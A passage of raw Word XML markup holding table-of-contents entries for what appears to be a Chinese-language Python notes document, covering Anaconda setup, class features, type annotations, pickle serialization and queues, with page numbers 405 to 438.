            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779857" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>anaconda</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779857 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>405</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77A19ACF" w14:textId="08459AE4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779858" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>下载</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779858 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>405</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DBCF442" w14:textId="493CFBDC" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779859" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779859 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>406</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24F34199" w14:textId="614EBA1D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779860" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>运行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779860 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>406</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23285836" w14:textId="5E5920E7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779861" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>写法特性</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779861 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>408</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5DCCC9FC" w14:textId="11F0B072" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779862" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>跨模块的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>global</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>不会影响本模块</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779862 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>408</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="146DB57F" w14:textId="476FE203" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779863" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>字符和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ascii</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>码互相转换：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ord(),ascii(),chr()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779863 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>408</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FD880A8" w14:textId="1DD75737" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779864" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>断言</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779864 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>409</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FCC9DB9" w14:textId="3FA46A0B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779865" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>类型判断</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779865 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>409</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27CBA33E" w14:textId="2D2E5456" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779866" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>类的继承与派生</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779866 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>410</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A423D9E" w14:textId="06B2C480" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779867" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>类属性：直接在</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>下写的非成员变量、函数</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779867 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>428</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A42A3CC" w14:textId="682FE4D1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779868" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>如何不实例化类，但是可以直接调用类的方法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779868 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>429</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1992BB4E" w14:textId="7E0F5402" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779869" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>标注复杂类型</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779869 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>432</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D284BEB" w14:textId="7D2C03BB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779870" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>交叉引用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779870 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>435</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DF55321" w14:textId="7CF33DD1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779871" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>网络请求的报错</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779871 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>435</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4783143F" w14:textId="7BCC1996" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779872" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pickle</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>序列化</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779872 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>436</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AAC8716" w14:textId="0A24C328" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779873" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>输入输出不立即打印</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779873 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>437</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17C71470" w14:textId="1212CCB1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779874" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>队列、链表</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779874 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>438</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
